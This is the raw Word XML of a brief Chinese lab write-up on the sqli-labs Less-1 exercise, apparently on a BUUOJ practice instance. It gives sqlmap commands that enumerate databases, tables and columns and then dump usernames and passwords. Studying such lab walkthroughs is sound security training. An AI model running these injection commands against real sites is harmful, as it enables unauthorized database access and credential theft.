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扫描sali_labs的less1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sqlmap -u 'http://7814e80d-fbd1-4d52-89ee-c5088de5bd26.node5.buuoj.cn/Less-1/?id=1' --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2797810"/>
            <wp:effectExtent l="0" t="0" r="571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通过数据库名 爆表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sqlmap -u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'http://7814e80d-fbd1-4d52-89ee-c5088de5bd26.node5.buuoj.cn/Less-1/?id=1' -tables -D security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2797810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爆字段名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sqlmap -u 'http://7814e80d-fbd1-4d52-89ee-c5088de5bd26.node5.buuoj.cn/Less-1/?id=1' --columns -T users -D security</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="279781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爆表中所有的记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap -u 'http://7814e80d-fbd1-4d52-89ee-c5088de5bd26.node5.buuoj.cn/Less-1/?id=1' --dump -C "id,password,username" -T users -D security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2797810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7D625673"/>
    <w:rsid w:val="7D62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2024-06-07T14:46:00Z</dcterms:created>
  <dc:creator>`</dc:creator>
  <cp:lastModifiedBy>`</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-07T15:08:21Z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E92434F8767B42AABEA53DE4D57A973B_11</vt:lpwstr>
  </property>
</Properties>
</file>